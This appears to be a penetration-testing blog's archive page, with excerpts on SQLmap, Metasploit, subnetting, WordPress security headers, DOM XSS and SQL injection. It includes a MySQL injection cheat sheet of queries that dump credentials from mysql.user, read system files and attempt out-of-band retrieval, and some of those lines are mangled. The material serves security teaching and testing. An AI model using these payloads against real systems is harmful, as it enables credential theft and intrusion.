Web Application Security

Introduction to SQLmap

I posted a while ago on the very basics of SQL Injection. Then after than I did a complete breakdown of the manual exploitation of SQL Injection. Armed with that post and a cheatsheet or two, you should be able to get knee deep in almost any injection point. However, the truth is that often these injection points can be exploited using free, publicly available tools such as SQLmap! SQL injection can be a time consuming thing to exploit, especially when it comes to blind or out-of-band injection! So why not take the path of least resistance and automate wherever you can.

CIDR Networking Subnets

Calculating Subnets and CIDR Quickly

A friend of mine mentioned recently that he has to work out subnet masks in his head for an exam and commented in reality he’d just use a subnet calculator. Whilst this is probably true, there’s a quick trick that might help if you’re calculating subnets under duress. This isn’t a full write up and offers no real explanation of why it works, it’s just pointing out a trick you may have missed which might come in handy one day!


Calculating the Details of Awkward Subnets

I posted recently about calculating subnets and CIDR notation quickly, but I didn’t mention in that post host to quickly get the Network ID, first host and Broadcast address for a subnet given an awkward address. This is another easy trick that covers that!


Introduction to Metasploit

Metasploit is a suite of tools built into a framework which automates and tracks many of the tasks of a penetration test, plus it integrates nicely with other common Penetration Testing tools like Nessus and Nmap. Metasploit was acquired by Rapid-7 in 2009 and there are now commercial variants however the free framework does provide everything you need for a successful Penetration Test from a command-line interface. If you’re curious of the differences Rapid-7 has a page where you can compare the free version against the commercial version here. Metasploit includes port scanners, exploit code, post-exploitation modules – all sorts!#

Web Application Security

Adding HTTP Security Headers to WordPress

There are a couple of sites out there which will take a look at the configuration of your site and give pointers as to where you can tighten up your configuration, pointing out if you’re missing headers such as Content-Security-Policy, X-Frame-Options or X-XSS-Protection.

If you run a WordPress Blog there’s a quick way of adding and removing headers – you can do it within the WordPress Admin interface, with the Appearance Editor:


“Whitelisting Penetration Testers is Cheating…”

…we don’t whitelist hackers!”


Metasploit: Using Workspaces

The Metasploit database is great for tracking a Penetration Testing engagement, the biggest the engagement the more that the database can offer you. It tracks alive hosts, pwned boxes and stolen loot – plus it timestamps actions too just in case you need to track what happened when.

Cheat Sheets

SQL Injection Cheat Sheet: MySQL


-- -


User details
SELECT user,password FROM mysql.user;

Database details
SELECT db_name();
SELECT database();
SELECT schema_name FROM information_schema.schemata;

Database credentials
SELECT host, user, password FROM mysql.user;

Server details
SELECT @@hostname;

Table Name
SELECT table_name FROM information_schema.tables;

Columns Names
SELECT column_name FROM information_schema.columns WHERE table_name = 'tablename';

No Quotes
CONCAT(CHAR(97), CHAR(98), CHAR(99))

String Concatenation
CONCAT(foo, bar)

SELECT IF(1=1,'true','false');


Command Execution


Read Files
SELECT LOAD_FILE('C:Windowswin.ini');

Out-of-Band Retrieval
SELECT LOAD_FILE(concat('\\',(SELECT 1), '\')));

SELECT substr(‘Foobr’, 1, 1);

Retrieve Nth Line

This article is part of a Series, there are more to read below!
Basics and Defence
Filter Evasion with SQLmap
MySQL Cheat Sheet
MSSQL Cheat Sheet
Out-of-band Exploitation

Web Application Security

An Introduction to DOM XSS

Document Object Model Based Cross-Site Scripting (DOM Based XSS) is a type of Cross-site Scripting where instead of the payloads being stored or reflected by the remote web server and appearing in the response HTML the payload is instead stored in the DOM and processed insecurely by JavaScript. For those unfamiliar with what the DOM is, a short and fairly untechnical overview is available here.

The impact, and exploitation of DOM-XSS, is essentially the same as reflected or stored however the detection is a little different, as you can’t simply check the server responses and build up a payload. For example if you’re using Burp Suite for testing Burp doesn’t parse or execute JavaScript and therefore it won’t be too much help there. (It will however look for DOM-XSS through static analysis and pick up on issues such as location.hash ending up in document.write).

Web Application Security

SQL Injection: Exploitation

Structured Query Language (SQL) is used all over the web and is potentially vulnerable to an injection attack any time that user input is insecurely concatenated into a query. An injection attack allows an attacker to alter the logic of the query and the attack can lead to confidential data theft, website defacement, malware propagation and host or network compromise.